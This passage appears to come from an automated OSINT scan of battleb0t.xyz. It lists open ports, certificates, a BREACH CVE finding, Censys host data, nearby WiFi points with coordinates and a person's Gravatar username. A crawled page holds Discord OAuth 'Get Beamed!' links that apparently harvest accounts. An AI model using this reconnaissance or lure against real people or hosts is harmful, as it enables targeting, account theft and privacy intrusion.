911, "name": "Zoom Scheduler"}, "icnekagcncdgpdnpoecofjinkplbnocm": {"rating": 4.4411764, "users": 2000000, "platform": "", "short_description": "Read articles without distractions - use reader view. Make your reading process exceptional.", "icon": "https://lh3.googleusercontent.com/YBio0Hy33x3naSYfOCJBEMCntZexQLygzl17tRtLkxQXhR6esY8BtGoe7tgYNDmg3ZYAC2iTrQBdY-NVWXivPsn6r5A=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 34, "name": "Easyview Reader view"}, "fejgiddmdpgdmhhdjbophmflidmdpgdi": {"rating": 4.3333335, "users": 2000000, "platform": "", "short_description": "Increase audio volume up to 600% from the maximum! Boost your sound", "icon": "https://lh3.googleusercontent.com/0LHATIT-6LW9AX2Yy9uzoPDenL7TkUN-C_nsXHx9fODi7cQCp97p20zVArwcsk4UcocYknKLTd5Wyr6y4iW1q5T3hWE=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 27, "name": "Volume Booster Plus"}, "efaidnbmnnnibpcajpcglclefindmkaj": {"rating": 4.290437, "users": 10000000, "platform": "", "short_description": "Do more in Google Chrome with Adobe Acrobat PDF tools. View, fill, comment, sign, and try convert and compress tools.", "icon": "https://lh3.googleusercontent.com/aqahGz3euXadmtmp8NZnuKPoUm4cmewNY0AI1a_cMsC28cfvB2Bx3NArY9Mi50o2zF45Uh74Rmmq-Bh6dJRsVAbm=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 34937, "name": "Adobe Acrobat: PDF edit, convert, sign tools"}, "laookkfknpbbblfpciffpaejjkokdgca": {"rating": 4.4679146, "users": 3000000, "platform": "", "short_description": "Replace new tab page with a personal dashboard to help you get focused, stay organized, and keep motivated to achieve your goals.", "icon": "https://lh3.googleusercontent.com/H9tXckFzG4jZjM5Ag6gvBl0dCm75uQIlextzqmubbZ4stRiSfAyRG6pna-QjMk4S5kOCeShmPMcWxlPPdKlQyDqW=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 13838, "name": "Momentum"}, "bpconcjcammlapcogcnnelfmaeghhagj": {"rating": 4.6261697, "users": 1000000, "platform": "", "short_description": "Record screencasts - record video from your screen. Screen Capture FULL Web page or any part. Edit screenshots.", "icon": "https://lh3.googleusercontent.com/VOnmhiXEBw4cIinxoJYNVSdqWr-xOchHol4frxQCitlE2mmsh1TByQ2zYNDv8sdyEP0lNrmwY4_FOi64MV1WQCnRS6U=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 16882, "name": "Nimbus Screenshot & Screen Video Recorder"}, "admmjipmmciaobhojoghlmleefbicajg": {"rating": 3.0946643, "users": 4000000, "platform": "", "short_description": "A cloud-based password manager that makes it easy to log in to your favorite sites.", "icon": "https://lh3.googleusercontent.com/uJX-GTxk93n7vQYuG55g9ULQFUknftFjN3ZAjbObhTQ3DIQlDHrcVfgfw7sLBpvSQDSl_Kv10WqpB1HvNUg9nWF_YQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1162, "name": "Norton Password Manager"}, "gmbmikajjgmnabiglmofipeabaddhgne": {"rating": 3.9548225, "users": 7000000, "platform": "", "short_description": "Save web content or screen capture directly to Google Drive.", "icon": "https://lh3.googleusercontent.com/TFO5gDBZMhZOyeKAozOLYsxulAwh_RT7qY3vdqKt_8NTMWQjSNRLFc9CjPdkC2MSPimqwSB__nG24HKw4Y1hMdtLLw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 4759, "name": "Save to Google Drive"}, "cjpalhdlnbpafiamejdnhcphjbkeiagm": {"rating": 4.6761365, "users": 10000000, "platform": "", "short_description": "Finally, an efficient blocker. Easy on CPU and memory.", "icon": "https://lh3.googleusercontent.com/rrgyVBVte7CfjjeTU-rCHDKba7vtq-yn3o8-10p5b6QOj_2VCDAO3VdggV5fUnugbG2eDGPPjoJ9rsiU_tUZBExgLGc=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 26400, "name": "uBlock Origin"}, "bkkbcggnhapdmkeljlodobbkopceiche": {"rating": 4.7756734, "users": 2000000, "platform": "", "short_description": "Block popups, ads, cookie requests, trackers, notifications, ads on social media & more. A clean browsing experience starts today.", "icon": "https://lh3.googleusercontent.com/R9P6olNFUIkjebO_S6vG-1SulDiFYNVgtI8U-r3rm9Gq6TI__wd5ZIdeMxEB_9jL01MmRJve7CI28HLY18dJUOFibJs=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 80784, "name": "Pop up blocker for Chrome\u2122 - Poper Blocker"}, "flliilndjeohchalpbbcdekjklbdgfkk": {"rating": 4.1474295, "users": 6000000, "platform": "", "short_description": "Your surfing made private and secure", "icon": "https://lh3.googleusercontent.com/hjQv8jaFVCyh3Df1rAM6LTeuBY0wOxZAESgsLsysTHGOCQHt5XZP_44v5HM-xIjv-1gVTUHaehBTrF2hoqNcS5RFXK0=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2937, "name": "Avira Browser Safety"}, "mlomiejdfkolichcflejclcbmpeaniij": {"rating": 4.6202865, "users": 2000000, "platform": "", "short_description": "Ghostery is a powerful privacy extension. Block ads, stop trackers and speed up websites.", "icon": "https://lh3.googleusercontent.com/CpXOKuccvzh9oCG7G6NLr5nAvqUEdMLgfqWsYrKR92loF74N42s1B6LPtolnoVJphyP7WMTOtQRY7eAb2v61x1tOmQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 12836, "name": "Ghostery \u2013 Privacy Ad Blocker"}, "pgjjikdiikihdfpoppgaidccahalehjh": {"rating": 4.414451, "users": 2000000, "platform": "", "short_description": "Take a Speedtest directly from your toolbar to quickly test your internet performance without interruption.", "icon": "https://lh3.googleusercontent.com/UeJDiqRqbe61ZwRA-nshMyadO7gt5igLJN5jGy3he_VVP5iELduwit3AdBk9gTnCiDzDIQtlUJv6mQ-V7_7azrShxQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2934, "name": "Speedtest by Ookla"}, "fjgncogppolhfdpijihbpfmeohpaadpc": {"rating": 4.473016, "users": 2000000, "platform": "", "short_description": "Fast, one-click access to millions of research papers.", "icon": "https://lh3.googleusercontent.com/orDWHjYrSVYleMvmm7KTV9GHN_DcjWfOUKP6MVQ-JxjaW3BUF61B9Z2gPU__qY23z764gn7FLubSqYbcZZ8H_w3LJg=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 315, "name": "EndNote Click - Formerly Kopernio"}, "gpdjojdkbbmdfjfahjcgigfpmkopogic": {"rating": 3.558845, "users": 7000000, "platform": "", "short_description": "Save your favorite ideas online so you |
| 2023-05-12 03:10:05 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | ecash-pay.com | www.donation.ecash-pay.com |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CableWiFi (Net ID: 00:0D:67:8C:21:AB) | 39.0469, -77.4903 |
| 2023-05-12 03:16:31 | Physical Location | No | ipapi.co | 0 | 0 | 3 | 0 | None | Frankfurt am Main, Hesse, HE, Germany, DE | 207.154.228.169 |
| 2023-05-12 03:24:19 | Account on External Site | No | Account Finder | 0 | 0 | 8 | 0 | None | Gravatar (Category: images)
http://en.gravatar.com/profiles/baptistevauthey | baptistevauthey |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | xfinitywifi (Net ID: 00:0D:67:65:A6:FB) | 32.8608, -79.9746 |
| 2023-05-12 02:54:03 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 172.67.135.9:2053 | 172.67.135.9 |
| 2023-05-12 03:03:23 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00-evan.github.io |
| 2023-05-12 02:55:21 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 207.154.228.169:80 | 207.154.228.169 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/carti_3.JPG | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:03:16 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | cpcalendars.ayhu.xyz | [{u'not_after': u'2023-07-10T04:54:49', u'not_before': u'2023-04-11T04:54:50', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0d408dd97ca1bd4c0d06c53fc3e92ebc', u'entry_timestamp': u'2023-04-11T05:54:51.221', u'id': 9117673170}, {u'not_after': u'2023-05-12T05:22:09', u'not_before': u'2023-02-11T05:22:10', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0ce3f41ce8cbbbcf13f76c6f365ec2eb', u'entry_timestamp': u'2023-02-11T06:22:11.299', u'id': 8627857885}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.333', u'id': 8209207679}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.07', u'id': 8196466589}, {u'not_after': u'2023-03-14T04:12:06', u'not_before': u'2022-12-14T04:12:07', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'00ff0e1ea46f55f0740eb383e107c9ea93', u'entry_timestamp': u'2022-12-14T05:12:08.377', u'id': 8196466213}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:55.433', u'id': 8209126729}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:54.573', u'id': 8196005223}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:55.143', u'id': 8206782905}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:54.437', u'id': 8193169403}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.931', u'id': 8206381262}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.083', u'id': 8192906588}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.988', u'id': 8206326761}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.756', u'id': 8193180831}] |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SF Library (Net ID: 00:02:2D:01:53:3D) | 37.7642, -122.3993 |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.60): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:02:2D:03:B5:CA) | 37.7642, -122.3993 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | NSA (Net ID: 00:02:6F:24:1C:7D) | 32.8608, -79.9746 |
| 2023-05-12 03:18:06 | URL (Uses Javascript) | No | Page Information | 0 | 0 | 3 | 0 | None | http://pics.battleb0t.xyz | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
| 2023-05-12 02:54:13 | Linked URL - Internal | No | Web Spider | 4 | 0 | 2 | 0 | None | https://battleb0t.xyz/./src/style.css?4 | https://battleb0t.xyz/ |
| 2023-05-12 02:50:07 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:53:52:1f:22:68:d4:e4:bd:04:c1:ea:37:ae:da:35:a4:38
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 27 17:58:43 2023 GMT
Not After : Apr 27 17:58:42 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:b9:fb:28:d5:65:83:30:d8:31:05:3e:6a:85:ce:
46:6b:90:7d:d6:90:24:15:f6:22:bc:5f:40:25:72:
5b:e7:43:22:3b:78:ef:22:83:15:af:43:b2:d9:fc:
7d:1a:db:a9:94:2a:ae:eb:dd:dd:89:95:48:86:c7:
3d:d8:4e:b8:52:f3:2e:7f:e0:9b:c5:82:6c:d6:06:
76:85:79:68:7f:b5:68:c5:54:d6:da:9f:0d:42:eb:
eb:78:16:9b:0c:f7:71:92:43:a6:d3:11:c7:27:14:
9e:cd:a5:85:3a:ff:06:6c:60:87:93:13:2c:dc:e9:
44:30:af:d5:55:3a:74:21:37:cc:29:72:2e:4e:f5:
19:19:e6:5d:c6:1c:c3:32:ad:91:33:45:63:c0:b2:
66:88:d4:28:10:ab:35:bf:1b:e2:b6:13:51:c2:fc:
05:07:9b:c6:54:ae:64:1d:50:a0:d8:e2:04:77:50:
9f:40:dd:68:16:1e:0c:0e:81:fa:eb:72:cf:f5:36:
95:d2:67:c3:4f:8e:c3:73:28:01:74:88:7e:c4:4f:
a7:e9:b7:fe:c9:c0:ff:2f:b4:44:b8:a3:61:79:25:
57:1a:c6:7d:41:02:2b:48:a8:75:9f:e9:8a:a8:25:
11:37:66:07:b2:f9:47:e8:c4:ab:b8:9a:0e:7a:bb:
b1:a5:ac:71:ee:85:d1:b6:9f:8c:59:d9:a4:ba:7d:
dc:a9:3f:d4:a9:da:6b:49:93:8d:b7:ed:d0:10:10:
3a:3d:a1:8d:54:88:45:8c:e7:d6:54:5d:8e:e4:5d:
c5:ff:df:b9:f9:a2:ee:ab:9f:c6:3f:4b:06:4d:63:
71:ab:51:6b:7d:38:3e:f3:da:53:ac:5a:a8:0b:4f:
7e:c7:d9:39:5d:36:7e:8b:ff:14:dd:1d:2a:34:03:
79:b2:19:e1:3c:2c:2f:e4:2d:a4:3c:e2:7a:8d:47:
92:45:d5:da:6b:08:e3:22:df:a9:94:5a:8f:90:14:
e5:6c:68:e1:1d:22:8f:1f:c3:5c:b7:24:90:75:5a:
e0:2a:31:19:c8:a9:78:9c:0a:51:95:3b:87:0c:a7:
99:0e:be:1b:bc:21:15:fe:dc:b9:6b:b1:e8:e2:43:
9f:ad:fd:5c:22:a4:20:c6:26:c0:2b:14:2d:ae:44:
dc:33:d8:22:aa:11:57:d7:44:19:1d:80:bb:50:5d:
0f:32:1b:da:79:77:90:80:ce:c3:28:c7:75:3b:c6:
47:f2:e5:98:64:b3:70:12:44:40:b0:21:b9:37:16:
ba:3e:63:8e:8d:d6:ba:d1:98:a1:05:b6:1a:03:b9:
41:51:80:5e:8c:55:bd:f9:47:df:ee:3c:ed:aa:ae:
83:f7:8f
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
C8:7D:70:94:FD:01:EF:B0:A3:B3:C1:02:F1:32:C9:D5:2D:71:C9:73
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
21:3b:56:fc:2b:9c:93:20:c1:2c:91:09:0d:ac:90:cb:0e:5c:
72:a2:ce:e5:13:5d:8c:49:8f:a0:ab:25:c3:01:70:a2:21:9b:
8b:b6:a5:f7:63:ac:53:cb:24:a6:ea:5e:26:dc:03:0c:34:93:
73:f1:ea:e9:83:ea:f0:f1:48:6c:3f:59:c0:85:06:54:41:39:
5b:b3:26:bb:7a:96:75:79:fe:94:2f:c7:2a:70:6e:62:2c:e5:
2b:cd:c4:cc:04:db:95:58:db:1b:87:6d:b6:6d:c8:2f:59:5b:
39:ce:0c:cc:c2:81:21:d5:39:65:f4:d2:81:33:62:bc:90:85:
91:2d:26:36:92:58:81:83:eb:0d:ef:49:b4:e4:7f:d5:0e:52:
0c:52:84:c3:8e:4d:32:02:c5:1e:50:b5:40:16:c2:b6:c6:6e:
3d:81:1a:b3:79:4c:24:0d:78:1b:2a:54:25:79:64:52:43:bf:
71:af:ac:4c:51:53:d6:09:ca:97:bf:92:2f:82:52:84:26:0d:
bf:e6:b9:bb:f6:11:a7:a2:20:01:a8:36:6d:46:b5:e4:bb:8e:
29:b6:1f:de:40:9e:e0:c3:15:57:b2:d7:4c:51:da:7a:e5:7e:
99:07:5f:64:ef:07:83:68:13:88:12:62:08:ba:bc:99:f4:d8:
79:5b:89:67
| battleb0t.xyz |
| 2023-05-12 03:06:53 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | 185.199.111.153 |
| 2023-05-12 03:00:25 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | aes128-gcm@openssh.com | {"operating_system": {"product": "Linux", "vendor": "Debian", "version": "10.2", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}, "last_updated_at": "2023-05-11T13:12:22.896Z", "ip": "64.226.81.43", "labels": ["remote-access"], "location_updated_at": "2023-05-04T23:08:56.702518Z", "autonomous_system_updated_at": "2023-05-04T23:08:56.702593Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kvydol.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-05T17:01:10.039852254Z"}, "kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-05-09T21:51:41.360251198Z"}, "wordpress-971118-3396556.cloudwaysapps.com": {"record_type": "A", "resolved_at": "2023-05-02T09:46:47.851165352Z"}}, "names": ["kvydol.easypanel.host", "kekw.battleb0t.xyz", "wordpress-971118-3396556.cloudwaysapps.com"], "reverse_dns": {"resolved_at": "2023-04-25T12:49:47.725442827Z", "names": ["971118.cloudwaysapps.com"]}}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:989054422845f7fb4a0f578fbb62a589973974ff9b7310e0eee11f9d1819efdb"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T11:58:34.839347829Z", "banner_hex": "5353482d322e302d4f70656e5353485f372e3970312044656269616e2d31302b64656231307532", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "0172e87daef36c52da4bd5592787fb64e976f73f4f61384a12164ac56f2ce5a1", "rsa_public_key": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 2048, "modulus": "uPxDpRdIrA/iz2ExEgRAxKmXST2zSxUUASzEIsL6O2PTrSNc6umFNFt/dHdxbK0YoU5gp4vR8iK16J/is3qdC1O0ZbGjQDlTCf7Ot9E/wR2JFzowSc1s9mpCkXPL2tjFtwBDcuHkmqou6ryP5VE5ak4jNCg57zigC0YIUbaIQBZ2jxMULPFDZH04Sm7BCi6dspyzcLPQj8OZRf2GyAISVhP0sEJYaziXVgNTRAQlqfYIDf9Nzlq1NseWj/r6MQ8+fir5bRq/WXlDIO3L0kx/XXBOQazwt1JhrESalbK3qpruuXFPUsHNFo5uT3KgeXHGYW3PgarxkIAvPDmJRHKYqQ==", "exponent": "AAEAAQ=="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ssh-rsa", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": 